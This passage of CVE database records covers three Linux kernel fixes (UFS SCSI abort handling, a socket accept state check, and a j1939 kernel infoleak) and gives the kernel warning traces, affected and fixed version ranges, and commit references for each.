          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: ufs: core: Improve SCSI abort handling\n\nThe following has been observed on a test setup:\n\nWARNING: CPU: 4 PID: 250 at drivers/scsi/ufs/ufshcd.c:2737 ufshcd_queuecommand+0x468/0x65c\nCall trace:\n ufshcd_queuecommand+0x468/0x65c\n scsi_send_eh_cmnd+0x224/0x6a0\n scsi_eh_test_devices+0x248/0x418\n scsi_eh_ready_devs+0xc34/0xe58\n scsi_error_handler+0x204/0x80c\n kthread+0x150/0x1b4\n ret_from_fork+0x10/0x30\n\nThat warning is triggered by the following statement:\n\n\tWARN_ON(lrbp-\u003ecmd);\n\nFix this warning by clearing lrbp-\u003ecmd from the abort handler."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T07:06:00.229Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/c36baca06efa833adaefba61f45fefdc49b6d070"
        },
        {
          "url": "https://git.kernel.org/stable/c/3ff1f6b6ba6f97f50862aa50e79959cc8ddc2566"
        }
      ],
      "title": "scsi: ufs: core: Improve SCSI abort handling",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2021-47188",
    "datePublished": "2024-04-10T18:56:27.567Z",
    "dateReserved": "2024-03-25T09:12:14.113Z",
    "dateUpdated": "2025-05-04T07:06:00.229Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-36484 (GCVE-0-2024-36484)

Vulnerability from cvelistv5 – Published: 2024-06-21 10:18 – Updated: 2025-05-04 12:56

Title

net: relax socket state check at accept time.

Summary

In the Linux kernel, the following vulnerability has been resolved: net: relax socket state check at accept time. Christoph reported the following splat: WARNING: CPU: 1 PID: 772 at net/ipv4/af_inet.c:761 __inet_accept+0x1f4/0x4a0 Modules linked in: CPU: 1 PID: 772 Comm: syz-executor510 Not tainted 6.9.0-rc7-g7da7119fe22b #56 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.11.0-2.el7 04/01/2014 RIP: 0010:__inet_accept+0x1f4/0x4a0 net/ipv4/af_inet.c:759 Code: 04 38 84 c0 0f 85 87 00 00 00 41 c7 04 24 03 00 00 00 48 83 c4 10 5b 41 5c 41 5d 41 5e 41 5f 5d c3 cc cc cc cc e8 ec b7 da fd <0f> 0b e9 7f fe ff ff e8 e0 b7 da fd 0f 0b e9 fe fe ff ff 89 d9 80 RSP: 0018:ffffc90000c2fc58 EFLAGS: 00010293 RAX: ffffffff836bdd14 RBX: 0000000000000000 RCX: ffff888104668000 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 RBP: dffffc0000000000 R08: ffffffff836bdb89 R09: fffff52000185f64 R10: dffffc0000000000 R11: fffff52000185f64 R12: dffffc0000000000 R13: 1ffff92000185f98 R14: ffff88810754d880 R15: ffff8881007b7800 FS: 000000001c772880(0000) GS:ffff88811b280000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fb9fcf2e178 CR3: 00000001045d2002 CR4: 0000000000770ef0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 PKRU: 55555554 Call Trace: <TASK> inet_accept+0x138/0x1d0 net/ipv4/af_inet.c:786 do_accept+0x435/0x620 net/socket.c:1929 __sys_accept4_file net/socket.c:1969 [inline] __sys_accept4+0x9b/0x110 net/socket.c:1999 __do_sys_accept net/socket.c:2016 [inline] __se_sys_accept net/socket.c:2013 [inline] __x64_sys_accept+0x7d/0x90 net/socket.c:2013 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0x58/0x100 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x76/0x7e RIP: 0033:0x4315f9 Code: fd ff 48 81 c4 80 00 00 00 e9 f1 fe ff ff 0f 1f 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 0f 83 ab b4 fd ff c3 66 2e 0f 1f 84 00 00 00 00 RSP: 002b:00007ffdb26d9c78 EFLAGS: 00000246 ORIG_RAX: 000000000000002b RAX: ffffffffffffffda RBX: 0000000000400300 RCX: 00000000004315f9 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000004 RBP: 00000000006e1018 R08: 0000000000400300 R09: 0000000000400300 R10: 0000000000400300 R11: 0000000000000246 R12: 0000000000000000 R13: 000000000040cdf0 R14: 000000000040ce80 R15: 0000000000000055 </TASK> The reproducer invokes shutdown() before entering the listener status. After commit 94062790aedb ("tcp: defer shutdown(SEND_SHUTDOWN) for TCP_SYN_RECV sockets"), the above causes the child to reach the accept syscall in FIN_WAIT1 status. Eric noted we can relax the existing assertion in __inet_accept()

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/7de00adc9bd035d86…
	https://git.kernel.org/stable/c/59801e88c99f7c3f4…
	https://git.kernel.org/stable/c/6e03006548c66b979…
	https://git.kernel.org/stable/c/21c14c556cccd0cb5…
	https://git.kernel.org/stable/c/c09ddc605893df542…
	https://git.kernel.org/stable/c/87bdc9f6f58b44173…
	https://git.kernel.org/stable/c/5f9a04a94fd1894d7…
	https://git.kernel.org/stable/c/26afda78cda3da974…

Impacted products

Vendor

Product

Version

Linux

Affected: 34e41a031fd7523bf1cd00a2adca2370aebea270 , < 7de00adc9bd035d861ba4177848ca0bfa5ed1e04 (git)
Affected: ed5e279b69e007ce6c0fe82a5a534c1b19783214 , < 59801e88c99f7c3f44a4d20af6ba6417aa359b5d (git)
Affected: 413c33b9f3bc36fdf719690a78824db9f88a9485 , < 6e03006548c66b979f4e5e9fc797aac4dad82822 (git)
Affected: 2552c9d9440f8e7a2ed0660911ff00f25b90a0a4 , < 21c14c556cccd0cb54b71ec5e901e64ba84c7165 (git)
Affected: 3fe4ef0568a48369b1891395d13ac593b1ba41b1 , < c09ddc605893df542c6cf8dde6a57a93f7cf0adb (git)
Affected: f47d0d32fa94e815fdd78b8b88684873e67939f4 , < 87bdc9f6f58b4417362d6932b49b828e319f97dc (git)
Affected: 94062790aedb505bdda209b10bea47b294d6394f , < 5f9a04a94fd1894d7009055ab8e5832a0242dba3 (git)
Affected: 94062790aedb505bdda209b10bea47b294d6394f , < 26afda78cda3da974fd4c287962c169e9462c495 (git)
Affected: cbf232ba11bc86a5281b4f00e1151349ef4d45cf (git)

Linux

Affected: 6.9
Unaffected: 0 , < 6.9 (semver)
Unaffected: 4.19.319 , ≤ 4.19.* (semver)
Unaffected: 5.4.281 , ≤ 5.4.* (semver)
Unaffected: 5.10.223 , ≤ 5.10.* (semver)
Unaffected: 5.15.164 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36484",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-21T13:58:06.399872Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-21T13:58:14.703Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:37:05.014Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7de00adc9bd035d861ba4177848ca0bfa5ed1e04"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/59801e88c99f7c3f44a4d20af6ba6417aa359b5d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6e03006548c66b979f4e5e9fc797aac4dad82822"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/21c14c556cccd0cb54b71ec5e901e64ba84c7165"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c09ddc605893df542c6cf8dde6a57a93f7cf0adb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/87bdc9f6f58b4417362d6932b49b828e319f97dc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5f9a04a94fd1894d7009055ab8e5832a0242dba3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/26afda78cda3da974fd4c287962c169e9462c495"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/af_inet.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "7de00adc9bd035d861ba4177848ca0bfa5ed1e04",
              "status": "affected",
              "version": "34e41a031fd7523bf1cd00a2adca2370aebea270",
              "versionType": "git"
            },
            {
              "lessThan": "59801e88c99f7c3f44a4d20af6ba6417aa359b5d",
              "status": "affected",
              "version": "ed5e279b69e007ce6c0fe82a5a534c1b19783214",
              "versionType": "git"
            },
            {
              "lessThan": "6e03006548c66b979f4e5e9fc797aac4dad82822",
              "status": "affected",
              "version": "413c33b9f3bc36fdf719690a78824db9f88a9485",
              "versionType": "git"
            },
            {
              "lessThan": "21c14c556cccd0cb54b71ec5e901e64ba84c7165",
              "status": "affected",
              "version": "2552c9d9440f8e7a2ed0660911ff00f25b90a0a4",
              "versionType": "git"
            },
            {
              "lessThan": "c09ddc605893df542c6cf8dde6a57a93f7cf0adb",
              "status": "affected",
              "version": "3fe4ef0568a48369b1891395d13ac593b1ba41b1",
              "versionType": "git"
            },
            {
              "lessThan": "87bdc9f6f58b4417362d6932b49b828e319f97dc",
              "status": "affected",
              "version": "f47d0d32fa94e815fdd78b8b88684873e67939f4",
              "versionType": "git"
            },
            {
              "lessThan": "5f9a04a94fd1894d7009055ab8e5832a0242dba3",
              "status": "affected",
              "version": "94062790aedb505bdda209b10bea47b294d6394f",
              "versionType": "git"
            },
            {
              "lessThan": "26afda78cda3da974fd4c287962c169e9462c495",
              "status": "affected",
              "version": "94062790aedb505bdda209b10bea47b294d6394f",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "cbf232ba11bc86a5281b4f00e1151349ef4d45cf",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/af_inet.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.9"
            },
            {
              "lessThan": "6.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.319",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.281",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.223",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.164",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.319",
                  "versionStartIncluding": "4.19.314",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.281",
                  "versionStartIncluding": "5.4.276",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.223",
                  "versionStartIncluding": "5.10.217",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.164",
                  "versionStartIncluding": "5.15.159",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "6.1.91",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "6.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "6.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.8.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: relax socket state check at accept time.\n\nChristoph reported the following splat:\n\nWARNING: CPU: 1 PID: 772 at net/ipv4/af_inet.c:761 __inet_accept+0x1f4/0x4a0\nModules linked in:\nCPU: 1 PID: 772 Comm: syz-executor510 Not tainted 6.9.0-rc7-g7da7119fe22b #56\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.11.0-2.el7 04/01/2014\nRIP: 0010:__inet_accept+0x1f4/0x4a0 net/ipv4/af_inet.c:759\nCode: 04 38 84 c0 0f 85 87 00 00 00 41 c7 04 24 03 00 00 00 48 83 c4 10 5b 41 5c 41 5d 41 5e 41 5f 5d c3 cc cc cc cc e8 ec b7 da fd \u003c0f\u003e 0b e9 7f fe ff ff e8 e0 b7 da fd 0f 0b e9 fe fe ff ff 89 d9 80\nRSP: 0018:ffffc90000c2fc58 EFLAGS: 00010293\nRAX: ffffffff836bdd14 RBX: 0000000000000000 RCX: ffff888104668000\nRDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\nRBP: dffffc0000000000 R08: ffffffff836bdb89 R09: fffff52000185f64\nR10: dffffc0000000000 R11: fffff52000185f64 R12: dffffc0000000000\nR13: 1ffff92000185f98 R14: ffff88810754d880 R15: ffff8881007b7800\nFS:  000000001c772880(0000) GS:ffff88811b280000(0000) knlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007fb9fcf2e178 CR3: 00000001045d2002 CR4: 0000000000770ef0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n inet_accept+0x138/0x1d0 net/ipv4/af_inet.c:786\n do_accept+0x435/0x620 net/socket.c:1929\n __sys_accept4_file net/socket.c:1969 [inline]\n __sys_accept4+0x9b/0x110 net/socket.c:1999\n __do_sys_accept net/socket.c:2016 [inline]\n __se_sys_accept net/socket.c:2013 [inline]\n __x64_sys_accept+0x7d/0x90 net/socket.c:2013\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x58/0x100 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\nRIP: 0033:0x4315f9\nCode: fd ff 48 81 c4 80 00 00 00 e9 f1 fe ff ff 0f 1f 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 0f 83 ab b4 fd ff c3 66 2e 0f 1f 84 00 00 00 00\nRSP: 002b:00007ffdb26d9c78 EFLAGS: 00000246 ORIG_RAX: 000000000000002b\nRAX: ffffffffffffffda RBX: 0000000000400300 RCX: 00000000004315f9\nRDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000004\nRBP: 00000000006e1018 R08: 0000000000400300 R09: 0000000000400300\nR10: 0000000000400300 R11: 0000000000000246 R12: 0000000000000000\nR13: 000000000040cdf0 R14: 000000000040ce80 R15: 0000000000000055\n \u003c/TASK\u003e\n\nThe reproducer invokes shutdown() before entering the listener status.\nAfter commit 94062790aedb (\"tcp: defer shutdown(SEND_SHUTDOWN) for\nTCP_SYN_RECV sockets\"), the above causes the child to reach the accept\nsyscall in FIN_WAIT1 status.\n\nEric noted we can relax the existing assertion in __inet_accept()"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:56:22.074Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/7de00adc9bd035d861ba4177848ca0bfa5ed1e04"
        },
        {
          "url": "https://git.kernel.org/stable/c/59801e88c99f7c3f44a4d20af6ba6417aa359b5d"
        },
        {
          "url": "https://git.kernel.org/stable/c/6e03006548c66b979f4e5e9fc797aac4dad82822"
        },
        {
          "url": "https://git.kernel.org/stable/c/21c14c556cccd0cb54b71ec5e901e64ba84c7165"
        },
        {
          "url": "https://git.kernel.org/stable/c/c09ddc605893df542c6cf8dde6a57a93f7cf0adb"
        },
        {
          "url": "https://git.kernel.org/stable/c/87bdc9f6f58b4417362d6932b49b828e319f97dc"
        },
        {
          "url": "https://git.kernel.org/stable/c/5f9a04a94fd1894d7009055ab8e5832a0242dba3"
        },
        {
          "url": "https://git.kernel.org/stable/c/26afda78cda3da974fd4c287962c169e9462c495"
        }
      ],
      "title": "net: relax socket state check at accept time.",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36484",
    "datePublished": "2024-06-21T10:18:09.672Z",
    "dateReserved": "2024-06-21T10:12:11.494Z",
    "dateUpdated": "2025-05-04T12:56:22.074Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42076 (GCVE-0-2024-42076)

Vulnerability from cvelistv5 – Published: 2024-07-29 15:52 – Updated: 2025-11-03 22:01

Title

net: can: j1939: Initialize unused data in j1939_send_one()

Summary

In the Linux kernel, the following vulnerability has been resolved: net: can: j1939: Initialize unused data in j1939_send_one() syzbot reported kernel-infoleak in raw_recvmsg() [1]. j1939_send_one() creates full frame including unused data, but it doesn't initialize it. This causes the kernel-infoleak issue. Fix this by initializing unused data. [1] BUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline] BUG: KMSAN: kernel-infoleak in copy_to_user_iter lib/iov_iter.c:24 [inline] BUG: KMSAN: kernel-infoleak in iterate_ubuf include/linux/iov_iter.h:29 [inline] BUG: KMSAN: kernel-infoleak in iterate_and_advance2 include/linux/iov_iter.h:245 [inline] BUG: KMSAN: kernel-infoleak in iterate_and_advance include/linux/iov_iter.h:271 [inline] BUG: KMSAN: kernel-infoleak in _copy_to_iter+0x366/0x2520 lib/iov_iter.c:185 instrument_copy_to_user include/linux/instrumented.h:114 [inline] copy_to_user_iter lib/iov_iter.c:24 [inline] iterate_ubuf include/linux/iov_iter.h:29 [inline] iterate_and_advance2 include/linux/iov_iter.h:245 [inline] iterate_and_advance include/linux/iov_iter.h:271 [inline] _copy_to_iter+0x366/0x2520 lib/iov_iter.c:185 copy_to_iter include/linux/uio.h:196 [inline] memcpy_to_msg include/linux/skbuff.h:4113 [inline] raw_recvmsg+0x2b8/0x9e0 net/can/raw.c:1008 sock_recvmsg_nosec net/socket.c:1046 [inline] sock_recvmsg+0x2c4/0x340 net/socket.c:1068 ____sys_recvmsg+0x18a/0x620 net/socket.c:2803 ___sys_recvmsg+0x223/0x840 net/socket.c:2845 do_recvmmsg+0x4fc/0xfd0 net/socket.c:2939 __sys_recvmmsg net/socket.c:3018 [inline] __do_sys_recvmmsg net/socket.c:3041 [inline] __se_sys_recvmmsg net/socket.c:3034 [inline] __x64_sys_recvmmsg+0x397/0x490 net/socket.c:3034 x64_sys_call+0xf6c/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:300 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f Uninit was created at: slab_post_alloc_hook mm/slub.c:3804 [inline] slab_alloc_node mm/slub.c:3845 [inline] kmem_cache_alloc_node+0x613/0xc50 mm/slub.c:3888 kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:577 __alloc_skb+0x35b/0x7a0 net/core/skbuff.c:668 alloc_skb include/linux/skbuff.h:1313 [inline] alloc_skb_with_frags+0xc8/0xbf0 net/core/skbuff.c:6504 sock_alloc_send_pskb+0xa81/0xbf0 net/core/sock.c:2795 sock_alloc_send_skb include/net/sock.h:1842 [inline] j1939_sk_alloc_skb net/can/j1939/socket.c:878 [inline] j1939_sk_send_loop net/can/j1939/socket.c:1142 [inline] j1939_sk_sendmsg+0xc0a/0x2730 net/can/j1939/socket.c:1277 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg+0x30f/0x380 net/socket.c:745 ____sys_sendmsg+0x877/0xb60 net/socket.c:2584 ___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638 __sys_sendmsg net/socket.c:2667 [inline] __do_sys_sendmsg net/socket.c:2676 [inline] __se_sys_sendmsg net/socket.c:2674 [inline] __x64_sys_sendmsg+0x307/0x4a0 net/socket.c:2674 x64_sys_call+0xc4b/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:47 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f Bytes 12-15 of 16 are uninitialized Memory access of size 16 starts at ffff888120969690 Data copied to user address 00000000200017c0 CPU: 1 PID: 5050 Comm: syz-executor198 Not tainted 6.9.0-rc5-syzkaller-00031-g71b1543c83d6 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/5e4ed38eb17eaca42…
	https://git.kernel.org/stable/c/a2a0ebff7fdeb2f66…
	https://git.kernel.org/stable/c/4c5dc3927e17489c1…
	https://git.kernel.org/stable/c/f97cbce6339235883…
	https://git.kernel.org/stable/c/ab2a683938ba4416d…
	https://git.kernel.org/stable/c/ba7e5ae8208ac07d8…
	https://git.kernel.org/stable/c/b7cdf1dd5d2a2d820…

Impacted products

Vendor

Product

Version

Linux

Affected: 9d71dd0c70099914fcd063135da3c580865e924c , < 5e4ed38eb17eaca42de57d500cc0f9668d2b6abf (git)
Affected: 9d71dd0c70099914fcd063135da3c580865e924c , < a2a0ebff7fdeb2f66e29335adf64b9e457300dd4 (git)
Affected: 9d71dd0c70099914fcd063135da3c580865e924c , < 4c5dc3927e17489c1cae6f48c0d5e4acb4cae01f (git)
Affected: 9d71dd0c70099914fcd063135da3c580865e924c , < f97cbce633923588307049c4aef9feb2987e371b (git)
Affected: 9d71dd0c70099914fcd063135da3c580865e924c , < ab2a683938ba4416d389c2f5651cbbb2c41b779f (git)
Affected: 9d71dd0c70099914fcd063135da3c580865e924c , < ba7e5ae8208ac07d8e1eace0951a34c169a2d298 (git)
Affected: 9d71dd0c70099914fcd063135da3c580865e924c , < b7cdf1dd5d2a2d8200efd98d1893684db48fe134 (git)

Linux

Affected: 5.4
Unaffected: 0 , < 5.4 (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:09.838Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5e4ed38eb17eaca42de57d500cc0f9668d2b6abf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a2a0ebff7fdeb2f66e29335adf64b9e457300dd4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4c5dc3927e17489c1cae6f48c0d5e4acb4cae01f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f97cbce633923588307049c4aef9feb2987e371b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ab2a683938ba4416d389c2f5651cbbb2c41b779f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ba7e5ae8208ac07d8e1eace0951a34c169a2d298"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b7cdf1dd5d2a2d8200efd98d1893684db48fe134"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42076",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:19:26.772684Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:57.462Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/can/j1939/main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5e4ed38eb17eaca42de57d500cc0f9668d2b6abf",
              "status": "affected",
              "version": "9d71dd0c70099914fcd063135da3c580865e924c",
              "versionType": "git"
            },
            {
              "lessThan": "a2a0ebff7fdeb2f66e29335adf64b9e457300dd4",
              "status": "affected",
              "version": "9d71dd0c70099914fcd063135da3c580865e924c",
              "versionType": "git"
            },
            {
              "lessThan": "4c5dc3927e17489c1cae6f48c0d5e4acb4cae01f",
              "status": "affected",
              "version": "9d71dd0c70099914fcd063135da3c580865e924c",
              "versionType": "git"
            },
            {
              "lessThan": "f97cbce633923588307049c4aef9feb2987e371b",
              "status": "affected",
              "version": "9d71dd0c70099914fcd063135da3c580865e924c",
              "versionType": "git"
            },
            {
              "lessThan": "ab2a683938ba4416d389c2f5651cbbb2c41b779f",
              "status": "affected",
              "version": "9d71dd0c70099914fcd063135da3c580865e924c",
              "versionType": "git"
            },
            {
              "lessThan": "ba7e5ae8208ac07d8e1eace0951a34c169a2d298",
              "status": "affected",
              "version": "9d71dd0c70099914fcd063135da3c580865e924c",
              "versionType": "git"
            },
            {
              "lessThan": "b7cdf1dd5d2a2d8200efd98d1893684db48fe134",
              "status": "affected",
              "version": "9d71dd0c70099914fcd063135da3c580865e924c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/can/j1939/main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.4"
            },
            {
              "lessThan": "5.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
